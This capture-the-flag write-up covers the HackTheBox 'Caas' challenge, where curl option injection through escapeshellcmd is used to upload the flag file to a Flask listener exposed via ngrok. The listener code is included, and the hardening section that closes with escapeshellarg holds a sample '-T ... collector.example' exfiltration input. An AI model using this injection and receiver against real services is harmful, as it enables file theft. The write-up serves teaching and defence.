Tags: python curl port_forwarding burpsuite flask ngrok 

## Caas Web Challenge writeup Cyber Apocalypse 2021 HackTheBox CTF

Post by [Gaurav Raj](https://thehackersbrain.github.io/) on April 24, 2021, 11:36 a.m.

## **Introduction**

Name: **Caas**

Difficulty: 1 star

Points: 300

Description:

cURL As A Service or CAAS is a brand new Alien application, built so that humans can test the status of their websites. However, it seems that the Aliens have not quite got the hang of Human programming and the application is riddled with issues.
This challenge will raise 43 euros for a good cause.

![](https://thehackersbrain.pythonanywhere.com/media/post-image/caas_banner.png)

### **Exploitation**

After analyzing the source code of the application, we found that it passes the URL through **escapeshellcmd($url)** before executing the **curl** command.

```php
$this->command = "curl -sL " . escapeshellcmd($url);
```

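Here we can see that the application concatenates the URL we pass onto the curl command line. `escapeshellcmd` only escapes shell metacharacters; it does not quote the value as a single argument, so spaces still separate arguments and we can pass any **curl** option as well. That means we can potentially upload the **flag** file to our own server.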

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/php_escapeshell.png)

Sounds interesting, right? Let's do it.

Here we created a **Flask** server to receive the flag and used **ngrok** (which can be downloaded from [here](https://ngrok.com/download)) to forward the port, as we have to listen for connections over the Internet.

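```python
#!/usr/bin/python3
from flask import Flask, request

app = Flask(__name__)


# Simple health check so we can confirm the tunnel reaches the server.
@app.route('/', methods=['GET', 'POST'])
def index():
    return "This API is working"


# curl -T uploads with PUT and appends the file name to the URL path.
@app.route('/flag/<file>', methods=["PUT"])
def flag(file):
    # Write the raw request body as bytes; str() on bytes would store "b'...'".
    with open('flag', 'wb') as fh:
        fh.write(request.stream.read())
    return '<h1 align="center">Flag Received</h1>'


# Debug mode is off: the listener is reachable from the Internet through ngrok.
app.run(debug=False, host="0.0.0.0")
```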

And here's the setup for ngrok:

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/ngrok_fwd.png)

Now we intercepted the request with **BurpSuite** and added the URL of our Flask server with the **-T** option, and the flag landed in the root directory of our server.

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/burp_request.png)

And here is our flag.

```bash
CHTB{f1le_r3trieval_4s_a_s3rv1ce}
```

![](https://raw.githubusercontent.com/thehackersbrain/thehackersbrain.github.io/master/images/joker/got_flag.png)
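The root cause in the `escapeshellcmd` line above, next to one way to close it. This is an added example, not the challenge's source or the author's code; the function names, sample inputs and placeholder hosts are constructed, and the http/https allow-list is an extra assumption beyond what the writeup covers.

```php
<?php
// Added example (not the challenge's source). Function names are hypothetical.

// Pattern from the page: escapeshellcmd() escapes shell metacharacters but
// leaves spaces alone, so the shell splits the input into several curl
// arguments and any token starting with "-" is parsed as a curl option.
function build_vulnerable(string $url): string
{
    return "curl -sL " . escapeshellcmd($url);
}

// Hardened form: validate first, then pass the value as exactly one operand.
function build_hardened(string $url): string
{
    // Reject whitespace and control characters outright.
    if (preg_match('/[\s\x00-\x1f\x7f]/', $url)) {
        throw new InvalidArgumentException('whitespace or control character in URL');
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        throw new InvalidArgumentException('not an absolute URL');
    }
    // Assumption: the service only ever needs to fetch http(s) URLs.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        throw new InvalidArgumentException('only http and https are allowed');
    }
    // "--" ends option parsing; escapeshellarg() single-quotes the value so
    // the shell hands curl one argument no matter what it contains.
    return 'curl -sL --proto =http,https --proto-redir =http,https -- '
        . escapeshellarg($url);
}

// Constructed sample inputs: one plain URL, one carrying an extra curl option.
$samples = [
    'https://example.com/status',
    '-T /tmp/constructed-sample.txt https://collector.example/',
];
foreach ($samples as $input) {
    echo "input:      $input\n";
    echo "vulnerable: " . build_vulnerable($input) . "\n";
    try {
        echo "hardened:   " . build_hardened($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened:   rejected (" . $e->getMessage() . ")\n";
    }
}
```

Calling curl through PHP's cURL extension instead of a shell removes the command line, and with it this class of option injection, entirely.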

Thanks, everyone, for reading this article. Don't forget to share it if you liked it.

Original writeup (https://thehackersbrain.pythonanywhere.com/blog/caas-web-challenge-writeup-cyber-apocalypse-2021-hackthebox-ctf/).